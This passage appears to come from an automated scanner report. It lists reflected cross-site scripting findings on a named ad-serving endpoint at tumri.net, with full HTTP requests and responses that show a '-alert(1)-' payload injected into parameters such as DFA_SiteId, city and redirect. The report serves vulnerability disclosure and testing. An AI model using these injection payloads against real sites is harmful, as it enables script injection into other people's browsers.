Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:12:36 GMT
Expires: Tue Jun 28 02:12:36 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=31F20D65308FC8EF631CB2508FA3BA56; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227156886 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
ce62cc%26_o%3D15719%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000e7075'-alert(1)-'ac765446717&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Ca
...[SNIP]...

1.392. http://www.tumri.net/ads/mts/6565 [DFA_SiteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the DFA_SiteId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32894'-alert(1)-'9fdfbb8f6ab was submitted in the DFA_SiteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=107307632894'-alert(1)-'9fdfbb8f6ab&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:13:27 GMT
Expires: Tue Jun 28 02:13:27 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D5B77E725A7C7244E0C09934DA3051D8; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227207551 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=107307632894'-alert(1)-'9fdfbb8f6ab&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=' + NS_1309227207551.flashVersion
...[SNIP]...

1.393. http://www.tumri.net/ads/mts/6565 [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the ac request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 910ed'-alert(1)-'11295b8c22c was submitted in the ac parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802910ed'-alert(1)-'11295b8c22c&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:14:10 GMT
Expires: Tue Jun 28 02:14:11 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7E8CA51FFE49B63C969BDABFAD7A4F7B; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227251042 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802910ed'-alert(1)-'11295b8c22c&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=' + NS_1309227251042.flashVersion + '">
...[SNIP]...

1.394. http://www.tumri.net/ads/mts/6565 [bw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the bw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5968d'-alert(1)-'7d554f50698 was submitted in the bw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=45968d'-alert(1)-'7d554f50698&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:14:44 GMT
Expires: Tue Jun 28 02:14:45 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2C7C4EDA8B06F4F498BD964CFEE4DDA8; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227285434 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
17%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=45968d'-alert(1)-'7d554f50698&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=' + NS_1309227285434.flashVersion + '">
...[SNIP]...

1.395. http://www.tumri.net/ads/mts/6565 [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the city request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63a36'-alert(1)-'378042528e8 was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=1756563a36'-alert(1)-'378042528e8&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:15:21 GMT
Expires: Tue Jun 28 02:15:21 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6A93396D9BC3483E182729D11F8F16A6; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227321969 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=1756563a36'-alert(1)-'378042528e8&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=' + NS_1309227321969.flashVersion + '">
...[SNIP]...

1.396. http://www.tumri.net/ads/mts/6565 [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the ct request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9c78'-alert(1)-'84e06e74097 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=USa9c78'-alert(1)-'84e06e74097&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:13:42 GMT
Expires: Tue Jun 28 02:13:43 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B341C397F2B141683A9BD9F1C39ADCED; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227223769 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=USa9c78'-alert(1)-'84e06e74097&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=' + NS_1309227223769.flashVersion + '">
...[SNIP]...

1.397. http://www.tumri.net/ads/mts/6565 [dma parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the dma request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65757'-alert(1)-'b928f3099f0 was submitted in the dma parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=2565757'-alert(1)-'b928f3099f0&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:15:02 GMT
Expires: Tue Jun 28 02:15:03 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=63A7E58697EF981C15D47E538F0F488A; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227303782 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=2565757'-alert(1)-'b928f3099f0&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=' + NS_1309227303782.flashVersion + '">
...[SNIP]...

1.398. http://www.tumri.net/ads/mts/6565 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bfc4'-alert(1)-'776217ed57d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&3bfc4'-alert(1)-'776217ed57d=1 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:16:07 GMT
Expires: Tue Jun 28 02:16:08 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 2722
Connection: keep-alive


var NS_1309227368591 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
reativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&3bfc4'-alert(1)-'776217ed57d=1&nf=' + NS_1309227368591.flashVersion + '">
...[SNIP]...

1.399. http://www.tumri.net/ads/mts/6565 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ed8a'-alert(1)-'fa896af9ac2 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||3ed8a'-alert(1)-'fa896af9ac2&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
